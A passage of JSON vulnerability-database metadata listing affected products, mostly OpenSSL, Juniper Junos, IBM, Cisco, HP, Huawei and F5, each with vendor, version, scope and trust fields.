"ibm", "version": "7.1.28" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.01" }, { "model": "universal small cell series software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50003.4.2.0" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "junos 12.3r2-s3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1r9", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "firepass", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "junos 12.1x46-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "updatexpress system packs installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "junos 12.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "documentum content server sp2", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77109.7" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.4.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.2" }, { "model": "quantum policy suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "junos d10", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x45" }, { "model": "tivoli netcool/system service monitor fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.5" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.07" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "system x3630m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73771.42" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.38" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.0" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "system dx360m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73211.42" }, { "model": "telepresence mxp series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos os 12.1x47-d10", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.12" }, { "model": "os/400 v1r5m0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.41" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "junos os 12.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70100" }, { "model": "srg1200\u00262200\u00263200 v100r002c02spc800", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "junos 12.1x46-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7779" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.19" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.25" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "cc v200r001c31", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 13.2r2-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "toolscenter suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.50" }, { "model": "s12700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.1" }, { "model": "oceanstor s5500t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.0" }, { "model": "software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "security information and event management hf3", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.1.4" }, { "model": "documentum content server sp2 p13", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "icewall sso dfw r2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "s2750\u0026s5700\u0026s6700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.3" }, { "model": "junos 12.1x46-d35", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "anyconnect secure mobility client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.3" }, { "model": "documentum content server sp2 p14", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "flex system enterprise chassis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8721" }, { "model": "junos 12.1r1.9", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ecns600 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "web gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.4.2.1" }, { "model": "jabber voice for iphone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junos os 12.1x46-d25", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "8.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "junos 12.1x47-d11", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.5" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.35" }, { "model": "junos d25", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x46" }, { "model": "security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos os 12.3r7", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.3r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.2.0.9" }, { "model": "puredata system for operational analytics a1791", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "junos 13.2r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "dsm v100r002c05spc615", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "system x3400m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "78361.42" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junos 12.3r3.4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "icewall sso certd r3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.8" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "junos 13.2x50-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl l", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.5" }, { "model": "paging server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junose", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.2.1" }, { "model": "ace application control engine module ace20", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4" }, { "model": "hyperdp oceanstor n8500 v200r001c09", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.210" }, { "model": "agent desktop for cisco unified contact center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "junos 12.1r5.5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "junos r8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.3" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.2" }, { "model": "hyperdp v200r001c91spc201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "unified attendant console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.2" }, { "model": "s3900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5600t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "ace application control engine module ace10", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v110.1" }, { "model": "junos r2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.3" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.1" }, { "model": "manageone v100r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.5" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463011.5" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "esight-ewl v300r001c10spc300", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos r6", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.3" }, { "model": "sa6000 ssl vpn", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "ave2000 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "tivoli workload scheduler distributed fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "rational clearquest", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.213" }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.1" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "usg9300 v200r001c01sph902", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "anyoffice v200r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "13.10" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.3" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.0" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v35006.4.19" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "junos 13.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2143" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.1" }, { "model": "usg9500 usg9500 v300r001c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u2990 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2.3" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.4.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.2" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "oceanstor s6800t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "manageone v100r001c02 spc901", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.23" }, { "model": "junos 12.1x45-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "oceanstor s2600t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "560010.1" }, { "model": "isoc v200r001c02spc202", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.11" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.23" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "ons series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154000" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8400" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.2" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webapp secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "9.1-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "call management system r17.0", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "junos 13.2x51-d15.5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "policy center v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "junos 12.3r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.3r9", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "colorqube ps", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "88704.76.0" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.212" }, { "model": "jabber video for ipad", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 12.1x44-d26", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ctpos 6.6r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 13.2x52-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.2" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "webex connect client for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.12" }, { "model": "junos 12.1x44-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos -d10", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x46" }, { "model": "junos space 13.1r1.6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.2x50-d20.4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "system dx360m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73251.42" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.13" }, { "model": "softco v200r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "junos 13.2r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rational clearcase", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.13" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.6" }, { "model": "junos 12.1x46-d36", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.1" }, { "model": "junos d10", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "12.1x47" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.021" }, { "model": "junos r2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "junos 12.3r4-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "nip2000\u00265000 v100r002c10hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "agile controller v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tapi service provider", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos os 13.3r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.2" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.1" }, { "model": "telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smc2.0 v100r002c01b017sp16", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storwize unified", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.32" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "junos 12.1x47-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.3r8.7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "physical access gateways", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "session border controller enterprise", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.4" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89410" }, { "model": "project openssl 0.9.8u", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "isoc v200r001c01spc101", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "5000" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos os 12.1x44-d40", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.5" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "security access manager for web appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.10" }, { "model": "documentum content server p06", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "junos 12.1r8-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junose", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.0.3" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6" }, { "model": "prime network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.029" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "junos 12.3r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "isoc v200r001c00spc202", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "3000" }, { "model": "small business isa500 series integrated security appliances", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 12.3r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.24" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.28" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "systems insight manager 7.3.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "9.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "junos 12.1x44-d51", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "idp 4.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "usg9500 usg9500 v300r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, 